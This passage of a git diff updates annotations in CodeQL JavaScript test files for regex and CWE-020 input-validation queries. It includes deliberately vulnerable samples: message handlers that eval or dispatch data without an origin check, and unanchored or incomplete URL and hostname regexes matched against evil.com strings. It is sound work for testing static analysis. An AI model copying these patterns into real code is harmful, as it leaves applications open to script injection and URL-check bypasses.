a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js @@ -9,5 +9,5 @@ /[\x0a\x0a]/; /[\u000a\n]/; /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js @@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { @@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..319eedf7e22c 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; +/^(?\s+)\w+\2$/; // $ Alert /^(?\s+)\w+\k$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js @@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index = x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { @@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..5267128a0f3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js @@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..895707fae0fc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js @@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // $ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( @@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true @@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js @@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = 